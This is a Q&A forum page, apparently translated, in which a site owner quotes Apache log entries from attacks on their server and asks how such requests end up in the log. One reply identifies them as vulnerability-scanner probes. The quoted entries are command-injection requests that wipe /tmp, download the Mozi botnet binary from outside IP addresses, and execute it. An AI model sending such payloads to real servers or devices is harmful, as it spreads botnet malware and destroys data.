Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
G
G
GogenZZo2021-05-31 11:05:00
Apache HTTP Server
GogenZZo, 2021-05-31 11:05:00

How to leave a trace in Apache logs?

Hello. I look at the Apache logs, someone is trying to upload a file, and unfortunately they succeeded. There are entries like this
"GET /shell?cd+/tmp;rm+-rf+*;wget+ 117.221.178.19:40872/Mozi.a;chmod+777+Mozi.a;/tmp/... HTTP/1.0" 404 1723 "- " "Hello, world"
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+ 178.175.88.132:39452/Mozi.m+-O+/tmp/netgear;sh+net. .. HTTP/1.0" 500 1711 "-" "-"

No matter how I tried, through the domain, or by ip address, contact the same way, but the browser just says 404. I also tried to make a request directly through telnet. And there is nothing in the logs. How do they make such a request that Apache writes it to the log?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

1 answer(s)
Report
V
Vladimir Korotenko, 2021-05-31
@firedragon

Someone scans your web server, the web server says that there is no such file, and the second time it gives an error. And such a result can be obtained by running any vulnerability scanner on your address

Similar questions
A
Ainur Shakirov2016-09-13 10:54:20
How to turn off queue waiting in php (or whatever it's called?)? 1Reply
R
rivalsm2014-09-04 17:43:23
Why doesn't it rewrite from a subdomain to a subfolder in the main domain? 3Reply
A
alias_z2016-09-15 06:37:30
Redirecting htaccess from a page to another? 1Reply
R
romaaa322019-02-17 00:51:37
Why is all RAM being used? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question